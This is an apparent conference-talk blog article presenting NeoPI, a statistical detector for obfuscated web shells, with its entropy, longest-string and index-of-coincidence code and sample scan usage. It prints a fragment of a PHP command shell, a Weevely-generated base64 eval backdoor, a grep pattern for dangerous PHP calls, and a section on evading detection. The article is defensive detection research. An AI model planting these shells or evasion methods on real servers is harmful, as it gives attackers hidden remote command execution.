Web Shell Detection Using NeoPI
This article was part of a talk presented at BSidesChicago.
Whats Up With These Pesky Shells?
Web servers have become one of the main targets of malicious activity and are often a weak point within an organization’s infrastructure. Web application code is often deployed and forgotten or unmaintained by an organization, creating weak points which are vulnerable to attack. Web applications are often developed in scripting languages such as PHP, Python, Ruby, Perl, etc. These languages are sophisticated enough that a security issue within a web application can often lead to the execution of arbitrary scripting code.
When one of these conditions is identified by an attacker they often seek to persist their access by the deployment of web shell code. This code creates a “virtual” shell accessible via the web server. The shell typically permits system command execution and file access, among other possibly nasty functionality.
Imagine you are hosting a website that you believe may have been compromised. Your shared web server has thousands of PHP pages and an attacker may have planted a backdoor in any one, or more, of them. You have tried scanning the system and checking IDS logs but you think the backdoor may be customized particularly for your environment. As a result, signature based tools are coming up empty. How do you detect and remove this backdoor if current tools such as antivirus and IDS can’t detect it?
The type of backdoor we are discussing is a web shell. Web shells can be defined as an undocumented way to gain console access to a computer system though a dynamic server side web page. Traditionally these web-shells were simple and easy to detect. For example, let’s take the following PHP file:
"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "
This shell is straightforward and allows an attacker to simply enter a URL such as the fabricated example below to execute commands:
More sophisticated web shells include methods to interact with the console, edit files, etc. The readme file for the C99 shell, a webshell that has been around for almost a decade, states the following feature set:
Visual File Manager (Many Features)
Get all readable home directories
How do we detect unencrypted shells?
Shells such as C99 can be detected by crafting some keyword searches or using a signature based detection tool. We could grep for the following on a web-server in an attempt to locate a PHP backdoor (adapted from Steven Whitney):
grep -RPn "(system|phpinfo|pcntl_exec|python_eval|base64_decode|gzip|mkdir|fopen|fclose|readfile|passthru)" /pathto/webdir/
As one can imagine, this would generate a huge number of false positives, as many of these calls are used by legitimate web applications. We could also try a tool like Linux Malware Detect (LMD) . We ran Linux Malware Detect against a web command shell repository of 90 backdoors. LMD was able to detect 37 webshells out of the 90 scanned. This low of a rate of detection isn’t that surprising, as some of these web shells were Windows specific. What was surprising was Linux Malware Detect failed to detect some of the obfuscated webshells such as isko, shellzx, and fatal from the repository.
How do these methods work against custom shells?
We also created a custom webshell. We used the tool Weevely to generate an obfuscated and encrypted backdoor using the following commands:
server# python weevely.py -g -o test_shell.php -p qazwsxedc
This generated an encrypted web shell using the password ‘qazwsxedc’:
eval(base64_decode('cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwkYSk7IGlmKHJlc 2V0KCRhKT09J3FhJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPHp3c3hlZGM+JztldmFsKGJhc2U2NF 9kZWNvZGUoc3RyX3JlcGxhY2UoIiAiLCAiKyIsIGpvaW4oYXJyYXlfc2xpY2UoJGEsY291bnQoJGEpLTM pKSkpKTtlY2hvICc8L3p3c3hlZGM+Jzt9'));
We scanned the directory again with LMD and the test_shell.php was not detected.
In order to circumvent signature based detection, some web shells, like the one generated with Weevely, have implemented mechanisms specifically aimed at avoiding detection. Customized code is compressed and encryption techniques are used to obfuscate the code and avoid detection. This is especially effective at thwarting signature based detection systems or keyword searches. In addition, finding such files on enterprise web servers that contain tens of thousands of pages can be extremely difficult due to the sheer volume of data.
How easy is it to deploy a web shell?
Deploying these shells can be facilitated by a number of methods: command injection, file upload vulnerabilities, insecure FTP, and remote file include vulnerabilities. If the attacker can get the web server to execute the backdoor, the attacker gains shell level access with the host operating system running with the same privileges as the web server.
If we aren’t able to reliably detect web shells with traditional methods such as signature based detection what options do we have left? Enter NeoPI.
NeoPI is a Python script that uses a variety of statistical methods to detect obfuscated and encrypted content within text and script files. The intended purpose of NeoPI is to aid in the identification of hidden web shell code. The development focus of NeoPI was creating a tool that could be used in conjunction with other established detection methods such as Linux Malware Detect or traditional signature/keyword based searches.
NeoPI is platform independent and can be run on any system with Python 2.6 installed. The user running the script should have read access to all of the files that will be scanned.
NeoPI recursively scans through the file system from a base directory and will rank files based on the results of a number of tests. The ranking helps identify with a higher probability which files may be encrypted web shells. It also presents a “general” score derived from file rankings within the individual tests.
Analysis Methods Explained
NeoPI uses several different statistical methods to try and determine the likelihood that a file contains obfuscated code.
The longest string test identifies the length of the longest uninterrupted string within a file. This is useful because obfuscated code is often stored as a long string of encoded text within a file. Many popular encoding methods, such as base64 encoding, will produce a long string without space characters. Typical text and script files will be composed of relatively short length words; identifying files with uncharacteristically long strings may help to identify files with obfuscated code.
longest = 0
words = re.split("[s,n,r]", data)
for word in words:
if len(word) > longest:
longest = len(word)
The above code splits a string into “words” by space characters, new lines, and carriage returns. It then identifies and returns the length of the longest word.
Entropy is a measure of uncertainty within a value. Shannon entropy quantifies the expected value of the information contained in a message, usually in units such as bits. This test calculates the “Shannon entropy” of a file by determining the minimum number of bytes required to encode a file. This can be thought of as a measure of randomness. Measuring entropy is useful in locating encrypted shellcode. Encryption can often introduce a large amount of entropy into a text string.
entropy = 0
for x in range(256):
p_x = float(data.count(chr(x)))/len(data)
if p_x > 0:
entropy += - p_x * math.log(p_x, 2)
The above code will calculate the Shannon entropy of “data” and return a floating point number between 0 and 8. This value represents the byte entropy of “data”. This number equates to the number of bits per character required to represent “data”. A file containing a large degree of randomness or information would require more bits to communicate, hence producing a larger entropy value. Changing the log base from 2 to 8 within this function would return a value between 0 and 1. This may be usefull to match other calculated measures of entropy. The higher the number, the more entropy is present within the data string indicating a high degree of randomness or variety of information.
Index of Coincidence
The index of coincidence (I.C.) is a technique used in the cryptanalysis and natural language analysis of text. It calculates the occurrence of letter combinations as compared to a text sample where all letters are equally distributed. This returns a value which is generally consistent for different types of text; either by spoken language or scripting language. This value is useful in identifying text files with I.C.’s uncharacteristic for files of similar type. This may indicate that the file contains portions of text, either encoded or encrypted, that deviate from normal character distributions.
char_count = 0
total_char_count = 0
for x in range(256):
char = chr(x)
charcount = data.count(char)
char_count += charcount * (charcount - 1)
total_char_count += charcount
ic = float(char_count)/(total_char_count * (total_char_count - 1))
# Call method to caculate_char_count and append to total_char_count
The above code calculates the I.C.for string “data”. It will return a floating point number.
Several features are planned for the future development of NeoPI.
- Additional tests and fine tuning of tests based upon the file format may help detect anomalies. An example of this would be to run and collect an average Index of Coincidence of each web programming language. The current method for building the average index of coincidence is to only take the average of the files scanned. So one method for creating this may be building out very large python code repositories, running the index of coincidence, and storing that information. An example use case could be Python files deviating from an expected I.C.range for typical Python files would be flagged.
- Block entropy is another function we would like to add to the statistical analysis. Block entropy would allow us to read in files based on a predefined block size and analyze sub-portions of the test for entropy. This may help detect shells that use a combination of English Text and encrypted block to avoid detection.
- Multi-threading to speed up file analysis would be beneficial on ultra large web deployments.
Finally, we also plan on adding some basic signature detection scans to provide a secondary mechanism for detecting web shells.
How to use it
NeoPI is platform independent and will run on both Linux and Windows. To start using NeoPI first checkout the code from our github repository or from this website.
git clone ssh://firstname.lastname@example.org:Neohapsis/NeoPI.git
The small NeoPI script is now in your local directory. We are going to go though a few examples on Linux and then switch over to Windows.
Let’s run neopi.py with the -h flag to see the options.
[sbehrens@WebServer2 opt]$ ./neopi.py -h
Usage: neopi.py [options]
--version show program's version number and exit
-h, --help show this help message and exit
-C FILECSV, --csv=FILECSV
generate CSV outfile
-a, --all Run all tests [Entropy, Longest Word, Compression
-e, --entropy Run entropy Test
-l, --longestword Run longest word test
-c, --ic Run IC test
-A, --auto Run auto file extension tests
Let’s break down the options into greater detail.
-C FILECSV, --csv=FILECSV
This generates a CSV output file containing the results of the scan.
This runs all tests including entropy, longest word, and index of coincidence. In general, we suggest running all tests to build the most comprehensive list of possible web shells.
This flag can be set to run only the entropy test.
This flag can be set to run only the longest word test.
This flag can be set to run only the Index of Coincidence test.
This flag runs an auto generated regular expression that contains many common web application file extensions. This list is by no means comprehensive but does include a good ‘best effort’ scan if you are unsure of what web application languages your server is running. The current list of extensions are included below:
valid_regex = re.compile('.php|.asp|.aspx|.sh|.bash|.zsh|.csh|.tsch|.pl|.py|.txt|.cgi|.cfm')
Now that we are familiar with the flags and we have downloaded a copy of the script from GIT, let’s go ahead and run it on a web server we think may be infected with obfuscated web shells. To get a feel for how many pages we have let’s run the following command:
We specified that we are not concerned with many common image types. We can see that this webserver has quite a large number of webpages. Let’s say I’m pretty confident that my webserver only supports PHP pages. Let’s get a count for how many PHP pages we are dealing with:
We can see that the webserver hosts close to 4,000 PHP pages. We went ahead and planted four web shells throughout the web directories. This included a fully encrypted web shell, C99, a web shell that contained a mixture of encrypted and plain text, and a shell generated by Weevely. The files were modified to avoid signature based detection systems. This environment is meant to simulate the situation described above, where you believe a malicious web shell may exist within your web root, but signature based malware detection tools can’t seem to locate any malicious files. Let’s go head and run NeoPI to see if it can help.
[sbehrens@WebServer2 opt]$ sudo ./neopi.py -C scan1.csv -a -A /var/www/
This is the full output of the scan results. We can see that average I.C. is displayed at the top of the output. This gives us an average index of coincidence (kappa-plaintext) of .0372. It should be noted that the average index of coincidence is reported without normalizing the denominator. An interesting observation is that the expected coincidence rate for a uniform distribution of the English language is 0.0385. The tool displays the files with the lowest Index of Coincidence first. We see Index of Coincidence seems relatively abnormal for shell3.php. We also see Weevely, shell2.php, and shell.php have made it into the results. We then move down to Entropy, which shows shell3.php, shell2.php, and Weevely. Longest word is very helpful for detecting fully encrypted backdoors such as shell3.php and shell2.php.
We calculate a simple average of all three functions and give you a percentage of confidence on its probability. As we can see in the top 10 highest ranked files, the tool was able to identify shell3.php, weevely.php, shell.php. shell2.php which is predominately non encrypted did get flagged by I.C. and entropy, but did not make the average list. We highly suggest that you check out all of the files listed in each test as some tests are more effective at detecting certain shells than others.
The tool is cross compatible with Windows as well. In the example below, we use a regular expressing to just search for php and text files.
How to beat it
As with all malware detection, there are steps which can be taken to avoid detection. NeoPI is focused on detecting obfuscated code; in fact it will often perform better in detecting code which is MORE obfuscated. Unobfuscated code is transparent to the tests performed and would perfectly blend in with other code on the system (but be vulnerable to signature or expression search detection). Code obfuscated in such a way that the obfuscation looks like normal text will likely be not be highlighted by NeoPI. One such obfuscation method might encode/decode text into strings composed of valid English words or script language. This encoded string would escape I.C. analysis because the frequency of letters is consistent with genuine code. It would also have an entropy value consistent with genuine code because the word level obfuscation would bias the entropy calculation. Finally, so long as spaces are also implemented within the obfuscation the code would escape detection by a longest word search.
Here is example code for a simple encoding mechanism that would escape detection by NeoPI. It is loosely based off of the PHP shell listed in the beginning of the article.